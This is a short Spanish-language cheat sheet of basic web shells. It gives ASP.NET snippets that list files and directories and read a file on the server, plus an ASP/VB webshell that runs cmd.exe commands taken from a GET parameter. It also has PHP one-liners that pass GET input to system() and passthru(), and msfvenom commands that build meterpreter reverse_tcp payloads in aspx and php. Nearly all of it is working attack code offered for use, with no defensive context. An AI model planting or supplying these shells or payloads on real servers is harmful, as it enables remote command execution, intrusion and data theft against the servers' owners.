Shells básicas para servidores web.

Documentación ASP.NET:
https://docs.microsoft.com/es-es/dotnet/api/system.io?view=netframework-4.5

ASP.NET: Listar archivos de un directorio

<%=("[{0}]", string.Join(", ", System.IO.Directory.GetFiles("C:\\")))%>

<% Response.Write(string.Join(", ", System.IO.Directory.GetFiles("C:\\"))); %>

ASP.NET: Listar directorios de una ruta.

<%=("[{0}]", string.Join(", ", System.IO.Directory.GetDirectories("C:\\")))%>

<% Response.Write(string.Join(", ", System.IO.Directory.GetDirectories("C:\\"))); %>

ASP.NET: Mostrar el contenido de una archivo

<% Response.Write(System.IO.File.ReadAllText("C:\db.sql")) %>

ASP.NET: Crear una script para abrir una shell remota de meterpreter_reverse.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=XXX LPORT=YYY -f aspx > s.aspx

ASP: WebShell para ejecutar comandos por GET.

<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="system.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<%

  Dim myProcess As New Process()            
  Dim myProcessStartInfo As New ProcessStartInfo("c:\windows\system32\cmd.exe")
  

  myProcessStartInfo.UseShellExecute = false            
  myProcessStartInfo.RedirectStandardOutput = true            
  myProcess.StartInfo = myProcessStartInfo            
  myProcessStartInfo.Arguments="/c "+Request.Querystring("command")
  myProcess.Start()

  Dim myStreamReader As StreamReader = myProcess.StandardOutput            
  Dim myString As String = myStreamReader.Readtoend()   

  myProcess.Close()               
  Response.write(vbcrlf & mystring)  
%>

PHP: WebShell para ejecutar comandos por GET.

<?php system($_GET['command']); ?>

PHP: Shell para ejecutar comandos con passthru

<?php passthru($_GET['command']); ?>

PHP: Crear una script para abrir una shell remota de meterpreter_reverse.

msfvenom -p php/meterpreter/reverse_tcp LHOST=XXX LPORT=YYY -f raw -o s.php